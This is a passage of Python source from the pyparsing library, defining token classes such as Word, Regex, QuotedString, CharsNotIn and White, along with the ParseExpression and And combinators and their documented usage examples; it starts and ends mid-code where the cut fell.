self.mayReturnEmpty = False
def _generateDefaultName(self):
return "{}:{!r}".format(type(self).__name__, self.match_string)
def parseImpl(self, instring, loc, doActions=True):
start = loc
instrlen = len(instring)
maxloc = start + len(self.match_string)
if maxloc <= instrlen:
match_string = self.match_string
match_stringloc = 0
mismatches = []
maxMismatches = self.maxMismatches
for match_stringloc, s_m in enumerate(
zip(instring[loc:maxloc], match_string)
):
src, mat = s_m
if self.caseless:
src, mat = src.lower(), mat.lower()
if src != mat:
mismatches.append(match_stringloc)
if len(mismatches) > maxMismatches:
break
else:
loc = start + match_stringloc + 1
results = ParseResults([instring[start:loc]])
results["original"] = match_string
results["mismatches"] = mismatches
return loc, results
raise ParseException(instring, loc, self.errmsg, self)
class Word(Token):
"""Token for matching words composed of allowed character sets.
Parameters:
- ``init_chars`` - string of all characters that should be used to
match as a word; "ABC" will match "AAA", "ABAB", "CBAC", etc.;
if ``body_chars`` is also specified, then this is the string of
initial characters
- ``body_chars`` - string of characters that
can be used for matching after a matched initial character as
given in ``init_chars``; if omitted, same as the initial characters
(default=``None``)
- ``min`` - minimum number of characters to match (default=1)
- ``max`` - maximum number of characters to match (default=0)
- ``exact`` - exact number of characters to match (default=0)
- ``as_keyword`` - match as a keyword (default=``False``)
- ``exclude_chars`` - characters that might be
found in the input ``body_chars`` string but which should not be
accepted for matching ;useful to define a word of all
printables except for one or two characters, for instance
(default=``None``)
:class:`srange` is useful for defining custom character set strings
for defining :class:`Word` expressions, using range notation from
regular expression character sets.
A common mistake is to use :class:`Word` to match a specific literal
string, as in ``Word("Address")``. Remember that :class:`Word`
uses the string argument to define *sets* of matchable characters.
This expression would match "Add", "AAA", "dAred", or any other word
made up of the characters 'A', 'd', 'r', 'e', and 's'. To match an
exact literal string, use :class:`Literal` or :class:`Keyword`.
pyparsing includes helper strings for building Words:
- :class:`alphas`
- :class:`nums`
- :class:`alphanums`
- :class:`hexnums`
- :class:`alphas8bit` (alphabetic characters in ASCII range 128-255
- accented, tilded, umlauted, etc.)
- :class:`punc8bit` (non-alphabetic characters in ASCII range
128-255 - currency, symbols, superscripts, diacriticals, etc.)
- :class:`printables` (any non-whitespace character)
``alphas``, ``nums``, and ``printables`` are also defined in several
Unicode sets - see :class:`pyparsing_unicode``.
Example::
# a word composed of digits
integer = Word(nums) # equivalent to Word("0123456789") or Word(srange("0-9"))
# a word with a leading capital, and zero or more lowercase
capital_word = Word(alphas.upper(), alphas.lower())
# hostnames are alphanumeric, with leading alpha, and '-'
hostname = Word(alphas, alphanums + '-')
# roman numeral (not a strict parser, accepts invalid mix of characters)
roman = Word("IVXLCDM")
# any string of non-whitespace characters, except for ','
csv_value = Word(printables, exclude_chars=",")
"""
def __init__(
self,
init_chars: str = "",
body_chars: OptionalType[str] = None,
min: int = 1,
max: int = 0,
exact: int = 0,
as_keyword: bool = False,
exclude_chars: OptionalType[str] = None,
*,
initChars: OptionalType[str] = None,
bodyChars: OptionalType[str] = None,
asKeyword: bool = False,
excludeChars: OptionalType[str] = None,
):
initChars = initChars or init_chars
bodyChars = bodyChars or body_chars
asKeyword = asKeyword or as_keyword
excludeChars = excludeChars or exclude_chars
super().__init__()
if not initChars:
raise ValueError(
"invalid {}, initChars cannot be empty string".format(
type(self).__name__
)
)
initChars = set(initChars)
self.initChars = initChars
if excludeChars:
excludeChars = set(excludeChars)
initChars -= excludeChars
if bodyChars:
bodyChars = set(bodyChars) - excludeChars
self.initCharsOrig = "".join(sorted(initChars))
if bodyChars:
self.bodyCharsOrig = "".join(sorted(bodyChars))
self.bodyChars = set(bodyChars)
else:
self.bodyCharsOrig = "".join(sorted(initChars))
self.bodyChars = set(initChars)
self.maxSpecified = max > 0
if min < 1:
raise ValueError(
"cannot specify a minimum length < 1; use Opt(Word()) if zero-length word is permitted"
)
self.minLen = min
if max > 0:
self.maxLen = max
else:
self.maxLen = _MAX_INT
if exact > 0:
self.maxLen = exact
self.minLen = exact
self.errmsg = "Expected " + self.name
self.mayIndexError = False
self.asKeyword = asKeyword
# see if we can make a regex for this Word
if " " not in self.initChars | self.bodyChars and (min == 1 and exact == 0):
if self.bodyChars == self.initChars:
if max == 0:
repeat = "+"
elif max == 1:
repeat = ""
else:
repeat = "{{{},{}}}".format(
self.minLen, "" if self.maxLen == _MAX_INT else self.maxLen
)
self.reString = "[{}]{}".format(
_collapse_string_to_ranges(self.initChars),
repeat,
)
elif len(self.initChars) == 1:
if max == 0:
repeat = "*"
else:
repeat = "{{0,{}}}".format(max - 1)
self.reString = "{}[{}]{}".format(
re.escape(self.initCharsOrig),
_collapse_string_to_ranges(self.bodyChars),
repeat,
)
else:
if max == 0:
repeat = "*"
elif max == 2:
repeat = ""
else:
repeat = "{{0,{}}}".format(max - 1)
self.reString = "[{}][{}]{}".format(
_collapse_string_to_ranges(self.initChars),
_collapse_string_to_ranges(self.bodyChars),
repeat,
)
if self.asKeyword:
self.reString = r"\b" + self.reString + r"\b"
try:
self.re = re.compile(self.reString)
except sre_constants.error:
self.re = None
else:
self.re_match = self.re.match
self.__class__ = _WordRegex
def _generateDefaultName(self):
def charsAsStr(s):
max_repr_len = 16
s = _collapse_string_to_ranges(s, re_escape=False)
if len(s) > max_repr_len:
return s[: max_repr_len - 3] + "..."
else:
return s
if self.initChars != self.bodyChars:
base = "W:({}, {})".format(
charsAsStr(self.initChars), charsAsStr(self.bodyChars)
)
else:
base = "W:({})".format(charsAsStr(self.initChars))
# add length specification
if self.minLen > 1 or self.maxLen != _MAX_INT:
if self.minLen == self.maxLen:
if self.minLen == 1:
return base[2:]
else:
return base + "{{{}}}".format(self.minLen)
elif self.maxLen == _MAX_INT:
return base + "{{{},...}}".format(self.minLen)
else:
return base + "{{{},{}}}".format(self.minLen, self.maxLen)
return base
def parseImpl(self, instring, loc, doActions=True):
if instring[loc] not in self.initChars:
raise ParseException(instring, loc, self.errmsg, self)
start = loc
loc += 1
instrlen = len(instring)
bodychars = self.bodyChars
maxloc = start + self.maxLen
maxloc = min(maxloc, instrlen)
while loc < maxloc and instring[loc] in bodychars:
loc += 1
throwException = False
if loc - start < self.minLen:
throwException = True
elif self.maxSpecified and loc < instrlen and instring[loc] in bodychars:
throwException = True
elif self.asKeyword:
if (
start > 0
and instring[start - 1] in bodychars
or loc < instrlen
and instring[loc] in bodychars
):
throwException = True
if throwException:
raise ParseException(instring, loc, self.errmsg, self)
return loc, instring[start:loc]
class _WordRegex(Word):
def parseImpl(self, instring, loc, doActions=True):
result = self.re_match(instring, loc)
if not result:
raise ParseException(instring, loc, self.errmsg, self)
loc = result.end()
return loc, result.group()
class Char(_WordRegex):
"""A short-cut class for defining :class:`Word` ``(characters, exact=1)``,
when defining a match of any single character in a string of
characters.
"""
def __init__(
self,
charset: str,
as_keyword: bool = False,
exclude_chars: OptionalType[str] = None,
*,
asKeyword: bool = False,
excludeChars: OptionalType[str] = None,
):
asKeyword = asKeyword or as_keyword
excludeChars = excludeChars or exclude_chars
super().__init__(
charset, exact=1, asKeyword=asKeyword, excludeChars=excludeChars
)
self.reString = "[{}]".format(_collapse_string_to_ranges(self.initChars))
if asKeyword:
self.reString = r"\b{}\b".format(self.reString)
self.re = re.compile(self.reString)
self.re_match = self.re.match
class Regex(Token):
r"""Token for matching strings that match a given regular
expression. Defined with string specifying the regular expression in
a form recognized by the stdlib Python `re module <https://docs.python.org/3/library/re.html>`_.
If the given regex contains named groups (defined using ``(?P<name>...)``),
these will be preserved as named :class:`ParseResults`.
If instead of the Python stdlib ``re`` module you wish to use a different RE module
(such as the ``regex`` module), you can do so by building your ``Regex`` object with
a compiled RE that was compiled using ``regex``.
Example::
realnum = Regex(r"[+-]?\d+\.\d*")
# ref: https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular-expression
roman = Regex(r"M{0,4}(CM|CD|D?{0,3})(XC|XL|L?X{0,3})(IX|IV|V?I{0,3})")
# named fields in a regex will be returned as named results
date = Regex(r'(?P<year>\d{4})-(?P<month>\d\d?)-(?P<day>\d\d?)')
# the Regex class will accept re's compiled using the regex module
import regex
parser = pp.Regex(regex.compile(r'[0-9]'))
"""
def __init__(
self,
pattern: Any,
flags: Union[re.RegexFlag, int] = 0,
as_group_list: bool = False,
as_match: bool = False,
*,
asGroupList: bool = False,
asMatch: bool = False,
):
"""The parameters ``pattern`` and ``flags`` are passed
to the ``re.compile()`` function as-is. See the Python
`re module <https://docs.python.org/3/library/re.html>`_ module for an
explanation of the acceptable patterns and flags.
"""
super().__init__()
asGroupList = asGroupList or as_group_list
asMatch = asMatch or as_match
if isinstance(pattern, str_type):
if not pattern:
raise ValueError("null string passed to Regex; use Empty() instead")
self.pattern = pattern
self.flags = flags
try:
self.re = re.compile(self.pattern, self.flags)
self.reString = self.pattern
except sre_constants.error:
raise ValueError(
"invalid pattern ({!r}) passed to Regex".format(pattern)
)
elif hasattr(pattern, "pattern") and hasattr(pattern, "match"):
self.re = pattern
self.pattern = self.reString = pattern.pattern
self.flags = flags
else:
raise TypeError(
"Regex may only be constructed with a string or a compiled RE object"
)
self.re_match = self.re.match
self.errmsg = "Expected " + self.name
self.mayIndexError = False
self.mayReturnEmpty = self.re_match("") is not None
self.asGroupList = asGroupList
self.asMatch = asMatch
if self.asGroupList:
self.parseImpl = self.parseImplAsGroupList
if self.asMatch:
self.parseImpl = self.parseImplAsMatch
def _generateDefaultName(self):
return "Re:({})".format(repr(self.pattern).replace("\\\\", "\\"))
def parseImpl(self, instring, loc, doActions=True):
result = self.re_match(instring, loc)
if not result:
raise ParseException(instring, loc, self.errmsg, self)
loc = result.end()
ret = ParseResults(result.group())
d = result.groupdict()
if d:
for k, v in d.items():
ret[k] = v
return loc, ret
def parseImplAsGroupList(self, instring, loc, doActions=True):
result = self.re_match(instring, loc)
if not result:
raise ParseException(instring, loc, self.errmsg, self)
loc = result.end()
ret = result.groups()
return loc, ret
def parseImplAsMatch(self, instring, loc, doActions=True):
result = self.re_match(instring, loc)
if not result:
raise ParseException(instring, loc, self.errmsg, self)
loc = result.end()
ret = result
return loc, ret
def sub(self, repl):
r"""
Return :class:`Regex` with an attached parse action to transform the parsed
result as if called using `re.sub(expr, repl, string) <https://docs.python.org/3/library/re.html#re.sub>`_.
Example::
make_html = Regex(r"(\w+):(.*?):").sub(r"<\1>\2</\1>")
print(make_html.transform_string("h1:main title:"))
# prints "<h1>main title</h1>"
"""
if self.asGroupList:
raise TypeError("cannot use sub() with Regex(asGroupList=True)")
if self.asMatch and callable(repl):
raise TypeError("cannot use sub() with a callable with Regex(asMatch=True)")
if self.asMatch:
def pa(tokens):
return tokens[0].expand(repl)
else:
def pa(tokens):
return self.re.sub(repl, tokens[0])
return self.add_parse_action(pa)
class QuotedString(Token):
r"""
Token for matching strings that are delimited by quoting characters.
Defined with the following parameters:
- ``quote_char`` - string of one or more characters defining the
quote delimiting string
- ``esc_char`` - character to re_escape quotes, typically backslash
(default= ``None``)
- ``esc_quote`` - special quote sequence to re_escape an embedded quote
string (such as SQL's ``""`` to re_escape an embedded ``"``)
(default= ``None``)
- ``multiline`` - boolean indicating whether quotes can span
multiple lines (default= ``False``)
- ``unquote_results`` - boolean indicating whether the matched text
should be unquoted (default= ``True``)
- ``end_quote_char`` - string of one or more characters defining the
end of the quote delimited string (default= ``None`` => same as
quote_char)
- ``convert_whitespace_escapes`` - convert escaped whitespace
(``'\t'``, ``'\n'``, etc.) to actual whitespace
(default= ``True``)
Example::
qs = QuotedString('"')
print(qs.search_string('lsjdf "This is the quote" sldjf'))
complex_qs = QuotedString('{{', end_quote_char='}}')
print(complex_qs.search_string('lsjdf {{This is the "quote"}} sldjf'))
sql_qs = QuotedString('"', esc_quote='""')
print(sql_qs.search_string('lsjdf "This is the quote with ""embedded"" quotes" sldjf'))
prints::
[['This is the quote']]
[['This is the "quote"']]
[['This is the quote with "embedded" quotes']]
"""
ws_map = ((r"\t", "\t"), (r"\n", "\n"), (r"\f", "\f"), (r"\r", "\r"))
def __init__(
self,
quote_char: str = "",
esc_char: OptionalType[str] = None,
esc_quote: OptionalType[str] = None,
multiline: bool = False,
unquote_results: bool = True,
end_quote_char: OptionalType[str] = None,
convert_whitespace_escapes: bool = True,
*,
quoteChar: str = "",
escChar: OptionalType[str] = None,
escQuote: OptionalType[str] = None,
unquoteResults: bool = True,
endQuoteChar: OptionalType[str] = None,
convertWhitespaceEscapes: bool = True,
):
super().__init__()
escChar = escChar or esc_char
escQuote = escQuote or esc_quote
unquoteResults = unquoteResults and unquote_results
endQuoteChar = endQuoteChar or end_quote_char
convertWhitespaceEscapes = (
convertWhitespaceEscapes and convert_whitespace_escapes
)
quote_char = quoteChar or quote_char
# remove white space from quote chars - wont work anyway
quote_char = quote_char.strip()
if not quote_char:
raise ValueError("quote_char cannot be the empty string")
if endQuoteChar is None:
endQuoteChar = quote_char
else:
endQuoteChar = endQuoteChar.strip()
if not endQuoteChar:
raise ValueError("endQuoteChar cannot be the empty string")
self.quoteChar = quote_char
self.quoteCharLen = len(quote_char)
self.firstQuoteChar = quote_char[0]
self.endQuoteChar = endQuoteChar
self.endQuoteCharLen = len(endQuoteChar)
self.escChar = escChar
self.escQuote = escQuote
self.unquoteResults = unquoteResults
self.convertWhitespaceEscapes = convertWhitespaceEscapes
sep = ""
inner_pattern = ""
if escQuote:
inner_pattern += r"{}(?:{})".format(sep, re.escape(escQuote))
sep = "|"
if escChar:
inner_pattern += r"{}(?:{}.)".format(sep, re.escape(escChar))
sep = "|"
self.escCharReplacePattern = re.escape(self.escChar) + "(.)"
if len(self.endQuoteChar) > 1:
inner_pattern += (
"{}(?:".format(sep)
+ "|".join(
"(?:{}(?!{}))".format(
re.escape(self.endQuoteChar[:i]),
_escape_regex_range_chars(self.endQuoteChar[i:]),
)
for i in range(len(self.endQuoteChar) - 1, 0, -1)
)
+ ")"
)
sep = "|"
if multiline:
self.flags = re.MULTILINE | re.DOTALL
inner_pattern += r"{}(?:[^{}{}])".format(
sep,
_escape_regex_range_chars(self.endQuoteChar[0]),
(_escape_regex_range_chars(escChar) if escChar is not None else ""),
)
else:
self.flags = 0
inner_pattern += r"{}(?:[^{}\n\r{}])".format(
sep,
_escape_regex_range_chars(self.endQuoteChar[0]),
(_escape_regex_range_chars(escChar) if escChar is not None else ""),
)
self.pattern = "".join(
[
re.escape(self.quoteChar),
"(?:",
inner_pattern,
")*",
re.escape(self.endQuoteChar),
]
)
try:
self.re = re.compile(self.pattern, self.flags)
self.reString = self.pattern
self.re_match = self.re.match
except sre_constants.error:
raise ValueError(
"invalid pattern {!r} passed to Regex".format(self.pattern)
)
self.errmsg = "Expected " + self.name
self.mayIndexError = False
self.mayReturnEmpty = True
def _generateDefaultName(self):
if self.quoteChar == self.endQuoteChar and isinstance(self.quoteChar, str_type):
return "string enclosed in {!r}".format(self.quoteChar)
return "quoted string, starting with {} ending with {}".format(
self.quoteChar, self.endQuoteChar
)
def parseImpl(self, instring, loc, doActions=True):
result = (
instring[loc] == self.firstQuoteChar
and self.re_match(instring, loc)
or None
)
if not result:
raise ParseException(instring, loc, self.errmsg, self)
loc = result.end()
ret = result.group()
if self.unquoteResults:
# strip off quotes
ret = ret[self.quoteCharLen : -self.endQuoteCharLen]
if isinstance(ret, str_type):
# replace escaped whitespace
if "\\" in ret and self.convertWhitespaceEscapes:
for wslit, wschar in self.ws_map:
ret = ret.replace(wslit, wschar)
# replace escaped characters
if self.escChar:
ret = re.sub(self.escCharReplacePattern, r"\g<1>", ret)
# replace escaped quotes
if self.escQuote:
ret = ret.replace(self.escQuote, self.endQuoteChar)
return loc, ret
class CharsNotIn(Token):
"""Token for matching words composed of characters *not* in a given
set (will include whitespace in matched characters if not listed in
the provided exclusion set - see example). Defined with string
containing all disallowed characters, and an optional minimum,
maximum, and/or exact length. The default value for ``min`` is
1 (a minimum value < 1 is not valid); the default values for
``max`` and ``exact`` are 0, meaning no maximum or exact
length restriction.
Example::
# define a comma-separated-value as anything that is not a ','
csv_value = CharsNotIn(',')
print(delimited_list(csv_value).parse_string("dkls,lsdkjf,s12 34,@!#,213"))
prints::
['dkls', 'lsdkjf', 's12 34', '@!#', '213']
"""
def __init__(
self,
not_chars: str = "",
min: int = 1,
max: int = 0,
exact: int = 0,
*,
notChars: str = "",
):
super().__init__()
self.skipWhitespace = False
self.notChars = not_chars or notChars
self.notCharsSet = set(self.notChars)
if min < 1:
raise ValueError(
"cannot specify a minimum length < 1; use "
"Opt(CharsNotIn()) if zero-length char group is permitted"
)
self.minLen = min
if max > 0:
self.maxLen = max
else:
self.maxLen = _MAX_INT
if exact > 0:
self.maxLen = exact
self.minLen = exact
self.errmsg = "Expected " + self.name
self.mayReturnEmpty = self.minLen == 0
self.mayIndexError = False
def _generateDefaultName(self):
not_chars_str = _collapse_string_to_ranges(self.notChars)
if len(not_chars_str) > 16:
return "!W:({}...)".format(self.notChars[: 16 - 3])
else:
return "!W:({})".format(self.notChars)
def parseImpl(self, instring, loc, doActions=True):
notchars = self.notCharsSet
if instring[loc] in notchars:
raise ParseException(instring, loc, self.errmsg, self)
start = loc
loc += 1
maxlen = min(start + self.maxLen, len(instring))
while loc < maxlen and instring[loc] not in notchars:
loc += 1
if loc - start < self.minLen:
raise ParseException(instring, loc, self.errmsg, self)
return loc, instring[start:loc]
class White(Token):
"""Special matching class for matching whitespace. Normally,
whitespace is ignored by pyparsing grammars. This class is included
when some whitespace structures are significant. Define with
a string containing the whitespace characters to be matched; default
is ``" \\t\\r\\n"``. Also takes optional ``min``,
``max``, and ``exact`` arguments, as defined for the
:class:`Word` class.
"""
whiteStrs = {
" ": "<SP>",
"\t": "<TAB>",
"\n": "<LF>",
"\r": "<CR>",
"\f": "<FF>",
"\u00A0": "<NBSP>",
"\u1680": "<OGHAM_SPACE_MARK>",
"\u180E": "<MONGOLIAN_VOWEL_SEPARATOR>",
"\u2000": "<EN_QUAD>",
"\u2001": "<EM_QUAD>",
"\u2002": "<EN_SPACE>",
"\u2003": "<EM_SPACE>",
"\u2004": "<THREE-PER-EM_SPACE>",
"\u2005": "<FOUR-PER-EM_SPACE>",
"\u2006": "<SIX-PER-EM_SPACE>",
"\u2007": "<FIGURE_SPACE>",
"\u2008": "<PUNCTUATION_SPACE>",
"\u2009": "<THIN_SPACE>",
"\u200A": "<HAIR_SPACE>",
"\u200B": "<ZERO_WIDTH_SPACE>",
"\u202F": "<NNBSP>",
"\u205F": "<MMSP>",
"\u3000": "<IDEOGRAPHIC_SPACE>",
}
def __init__(self, ws: str = " \t\r\n", min: int = 1, max: int = 0, exact: int = 0):
super().__init__()
self.matchWhite = ws
self.set_whitespace_chars(
"".join(c for c in self.whiteChars if c not in self.matchWhite),
copy_defaults=True,
)
# self.leave_whitespace()
self.mayReturnEmpty = True
self.errmsg = "Expected " + self.name
self.minLen = min
if max > 0:
self.maxLen = max
else:
self.maxLen = _MAX_INT
if exact > 0:
self.maxLen = exact
self.minLen = exact
def _generateDefaultName(self):
return "".join(White.whiteStrs[c] for c in self.matchWhite)
def parseImpl(self, instring, loc, doActions=True):
if instring[loc] not in self.matchWhite:
raise ParseException(instring, loc, self.errmsg, self)
start = loc
loc += 1
maxloc = start + self.maxLen
maxloc = min(maxloc, len(instring))
while loc < maxloc and instring[loc] in self.matchWhite:
loc += 1
if loc - start < self.minLen:
raise ParseException(instring, loc, self.errmsg, self)
return loc, instring[start:loc]
class PositionToken(Token):
def __init__(self):
super().__init__()
self.mayReturnEmpty = True
self.mayIndexError = False
class GoToColumn(PositionToken):
"""Token to advance to a specific column of input text; useful for
tabular report scraping.
"""
def __init__(self, colno: int):
super().__init__()
self.col = colno
def preParse(self, instring, loc):
if col(loc, instring) != self.col:
instrlen = len(instring)
if self.ignoreExprs:
loc = self._skipIgnorables(instring, loc)
while (
loc < instrlen
and instring[loc].isspace()
and col(loc, instring) != self.col
):
loc += 1
return loc
def parseImpl(self, instring, loc, doActions=True):
thiscol = col(loc, instring)
if thiscol > self.col:
raise ParseException(instring, loc, "Text not in expected column", self)
newloc = loc + self.col - thiscol
ret = instring[loc:newloc]
return newloc, ret
class LineStart(PositionToken):
r"""Matches if current position is at the beginning of a line within
the parse string
Example::
test = '''\
AAA this line
AAA and this line
AAA but not this one
B AAA and definitely not this one
'''
for t in (LineStart() + 'AAA' + restOfLine).search_string(test):
print(t)
prints::
['AAA', ' this line']
['AAA', ' and this line']
"""
def __init__(self):
super().__init__()
self.leave_whitespace()
self.orig_whiteChars = set() | self.whiteChars
self.whiteChars.discard("\n")
self.skipper = Empty().set_whitespace_chars(self.whiteChars)
self.errmsg = "Expected start of line"
def preParse(self, instring, loc):
if loc == 0:
return loc
else:
ret = self.skipper.preParse(instring, loc)
if "\n" in self.orig_whiteChars:
while instring[ret : ret + 1] == "\n":
ret = self.skipper.preParse(instring, ret + 1)
return ret
def parseImpl(self, instring, loc, doActions=True):
if col(loc, instring) == 1:
return loc, []
raise ParseException(instring, loc, self.errmsg, self)
class LineEnd(PositionToken):
"""Matches if current position is at the end of a line within the
parse string
"""
def __init__(self):
super().__init__()
self.whiteChars.discard("\n")
self.set_whitespace_chars(self.whiteChars, copy_defaults=False)
self.errmsg = "Expected end of line"
def parseImpl(self, instring, loc, doActions=True):
if loc < len(instring):
if instring[loc] == "\n":
return loc + 1, "\n"
else:
raise ParseException(instring, loc, self.errmsg, self)
elif loc == len(instring):
return loc + 1, []
else:
raise ParseException(instring, loc, self.errmsg, self)
class StringStart(PositionToken):
"""Matches if current position is at the beginning of the parse
string
"""
def __init__(self):
super().__init__()
self.errmsg = "Expected start of text"
def parseImpl(self, instring, loc, doActions=True):
if loc != 0:
# see if entire string up to here is just whitespace and ignoreables
if loc != self.preParse(instring, 0):
raise ParseException(instring, loc, self.errmsg, self)
return loc, []
class StringEnd(PositionToken):
"""
Matches if current position is at the end of the parse string
"""
def __init__(self):
super().__init__()
self.errmsg = "Expected end of text"
def parseImpl(self, instring, loc, doActions=True):
if loc < len(instring):
raise ParseException(instring, loc, self.errmsg, self)
elif loc == len(instring):
return loc + 1, []
elif loc > len(instring):
return loc, []
else:
raise ParseException(instring, loc, self.errmsg, self)
class WordStart(PositionToken):
"""Matches if the current position is at the beginning of a
:class:`Word`, and is not preceded by any character in a given
set of ``word_chars`` (default= ``printables``). To emulate the
``\b`` behavior of regular expressions, use
``WordStart(alphanums)``. ``WordStart`` will also match at
the beginning of the string being parsed, or at the beginning of
a line.
"""
def __init__(self, word_chars: str = printables, *, wordChars: str = printables):
wordChars = word_chars if wordChars != printables else wordChars
super().__init__()
self.wordChars = set(wordChars)
self.errmsg = "Not at the start of a word"
def parseImpl(self, instring, loc, doActions=True):
if loc != 0:
if (
instring[loc - 1] in self.wordChars
or instring[loc] not in self.wordChars
):
raise ParseException(instring, loc, self.errmsg, self)
return loc, []
class WordEnd(PositionToken):
"""Matches if the current position is at the end of a :class:`Word`,
and is not followed by any character in a given set of ``word_chars``
(default= ``printables``). To emulate the ``\b`` behavior of
regular expressions, use ``WordEnd(alphanums)``. ``WordEnd``
will also match at the end of the string being parsed, or at the end
of a line.
"""
def __init__(self, word_chars: str = printables, *, wordChars: str = printables):
wordChars = word_chars if wordChars != printables else wordChars
super().__init__()
self.wordChars = set(wordChars)
self.skipWhitespace = False
self.errmsg = "Not at the end of a word"
def parseImpl(self, instring, loc, doActions=True):
instrlen = len(instring)
if instrlen > 0 and loc < instrlen:
if (
instring[loc] in self.wordChars
or instring[loc - 1] not in self.wordChars
):
raise ParseException(instring, loc, self.errmsg, self)
return loc, []
class ParseExpression(ParserElement):
"""Abstract subclass of ParserElement, for combining and
post-processing parsed tokens.
"""
def __init__(self, exprs: IterableType[ParserElement], savelist: bool = False):
super().__init__(savelist)
self.exprs: List[ParserElement]
if isinstance(exprs, _generatorType):
exprs = list(exprs)
if isinstance(exprs, str_type):
self.exprs = [self._literalStringClass(exprs)]
elif isinstance(exprs, ParserElement):
self.exprs = [exprs]
elif isinstance(exprs, Iterable):
exprs = list(exprs)
# if sequence of strings provided, wrap with Literal
if any(isinstance(expr, str_type) for expr in exprs):
exprs = (
self._literalStringClass(e) if isinstance(e, str_type) else e
for e in exprs
)
self.exprs = list(exprs)
else:
try:
self.exprs = list(exprs)
except TypeError:
self.exprs = [exprs]
self.callPreparse = False
def recurse(self):
return self.exprs[:]
def append(self, other):
self.exprs.append(other)
self._defaultName = None
return self
def leave_whitespace(self, recursive=True):
"""
Extends ``leave_whitespace`` defined in base class, and also invokes ``leave_whitespace`` on
all contained expressions.
"""
super().leave_whitespace(recursive)
if recursive:
self.exprs = [e.copy() for e in self.exprs]
for e in self.exprs:
e.leave_whitespace(recursive)
return self
def ignore_whitespace(self, recursive=True):
"""
Extends ``ignore_whitespace`` defined in base class, and also invokes ``leave_whitespace`` on
all contained expressions.
"""
super().ignore_whitespace(recursive)
if recursive:
self.exprs = [e.copy() for e in self.exprs]
for e in self.exprs:
e.ignore_whitespace(recursive)
return self
def ignore(self, other):
if isinstance(other, Suppress):
if other not in self.ignoreExprs:
super().ignore(other)
for e in self.exprs:
e.ignore(self.ignoreExprs[-1])
else:
super().ignore(other)
for e in self.exprs:
e.ignore(self.ignoreExprs[-1])
return self
def _generateDefaultName(self):
return "{}:({})".format(self.__class__.__name__, str(self.exprs))
def streamline(self):
if self.streamlined:
return self
super().streamline()
for e in self.exprs:
e.streamline()
# collapse nested :class:`And`'s of the form ``And(And(And(a, b), c), d)`` to ``And(a, b, c, d)``
# but only if there are no parse actions or resultsNames on the nested And's
# (likewise for :class:`Or`'s and :class:`MatchFirst`'s)
if len(self.exprs) == 2:
other = self.exprs[0]
if (
isinstance(other, self.__class__)
and not other.parseAction
and other.resultsName is None
and not other.debug
):
self.exprs = other.exprs[:] + [self.exprs[1]]
self._defaultName = None
self.mayReturnEmpty |= other.mayReturnEmpty
self.mayIndexError |= other.mayIndexError
other = self.exprs[-1]
if (
isinstance(other, self.__class__)
and not other.parseAction
and other.resultsName is None
and not other.debug
):
self.exprs = self.exprs[:-1] + other.exprs[:]
self._defaultName = None
self.mayReturnEmpty |= other.mayReturnEmpty
self.mayIndexError |= other.mayIndexError
self.errmsg = "Expected " + str(self)
return self
def validate(self, validateTrace=None):
tmp = (validateTrace if validateTrace is not None else [])[:] + [self]
for e in self.exprs:
e.validate(tmp)
self._checkRecursion([])
def copy(self):
ret = super().copy()
ret.exprs = [e.copy() for e in self.exprs]
return ret
def _setResultsName(self, name, listAllMatches=False):
if (
__diag__.warn_ungrouped_named_tokens_in_collection
and Diagnostics.warn_ungrouped_named_tokens_in_collection
not in self.suppress_warnings_
):
for e in self.exprs:
if (
isinstance(e, ParserElement)
and e.resultsName
and Diagnostics.warn_ungrouped_named_tokens_in_collection
not in e.suppress_warnings_
):
warnings.warn(
"{}: setting results name {!r} on {} expression "
"collides with {!r} on contained expression".format(
"warn_ungrouped_named_tokens_in_collection",
name,
type(self).__name__,
e.resultsName,
),
stacklevel=3,
)
return super()._setResultsName(name, listAllMatches)
ignoreWhitespace = ignore_whitespace
leaveWhitespace = leave_whitespace
class And(ParseExpression):
"""
Requires all given :class:`ParseExpression` s to be found in the given order.
Expressions may be separated by whitespace.
May be constructed using the ``'+'`` operator.
May also be constructed using the ``'-'`` operator, which will
suppress backtracking.
Example::
integer = Word(nums)
name_expr = OneOrMore(Word(alphas))
expr = And([integer("id"), name_expr("name"), integer("age")])
# more easily written as:
expr = integer("id") + name_expr("name") + integer("age")
"""
class _ErrorStop(Empty):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.leave_whitespace()
def _generateDefaultName(self):
return "-"
def __init__(self, exprs_arg: IterableType[ParserElement], savelist: bool = True):
exprs: List[ParserElement] = list(exprs_arg)
if exprs and Ellipsis in exprs:
tmp = []
for i, expr in enumerate(exprs):
if expr is Ellipsis:
if i < len(exprs) - 1:
skipto_arg: ParserElement = (Empty() + exprs[i + 1]).exprs[-1]
tmp.append(SkipTo(skipto_arg)("_skipped*"))
else:
raise Exception(
"cannot construct And with sequence ending in ..."
)
else:
tmp.append(expr)
exprs[:] = tmp
super().__init__(exprs, savelist)
if self.exprs:
self.mayReturnEmpty = all(e.mayReturnEmpty for e in self.exprs)
self.set_whitespace_chars(
self.exprs[0].whiteChars,
copy_defaults=self.exprs[0].copyDefaultWhiteChars,
)
self.skipWhitespace = self.exprs[0].skipWhitespace
else:
self.mayReturnEmpty = True
self.callPreparse = True
def streamline(self) -> ParserElement:
# collapse any _PendingSkip's
if self.exprs:
if any(
isinstance(e, ParseExpression)
and e.exprs
and isinstance(e.exprs[-1], _PendingSkip)
for e in self.exprs[:-1]
):
for i, e in enumerate(self.exprs[:-1]):
if e is None:
continue
if (
isinstance(e, ParseExpression)
and e.exprs
and isinstance(e.exprs[-1], _PendingSkip)
):
e.exprs[-1] = e.exprs[-1] + self.exprs[i + 1]
self.exprs[i + 1] = None
self.exprs = [e for e in self.exprs if e is not None]
super().streamline()
# link any IndentedBlocks to the prior expression
for prev, cur in zip(self.exprs, self.exprs[1:]):
# traverse cur or any first embedded expr of cur looking for an IndentedBlock
# (but watch out for recursive grammar)
seen = set()
while cur:
if id(cur) in seen:
break
seen.add(id(cur))
if isinstance(cur, IndentedBlock):
prev.add_parse_action(
lambda s, l, t: setattr(cur, "parent_anchor", col(l, s))
)
break
subs = cur.recurse()
cur = next(iter(subs), None)
self.mayReturnEmpty = all(e.mayReturnEmpty for e in self.exprs)
return self
def parseImpl(self, instring, loc, doActions=True):
# pass False as callPreParse arg to _parse for first element, since we already
# pre-parsed the string as part of our And pre-parsing
loc, resultlist = self.exprs[0]._parse(
instring, loc, doActions, callPreParse=False
)
errorStop = False
for e in self.exprs[1:]:
# if isinstance(e, And._ErrorStop):
if type(e) is And._ErrorStop:
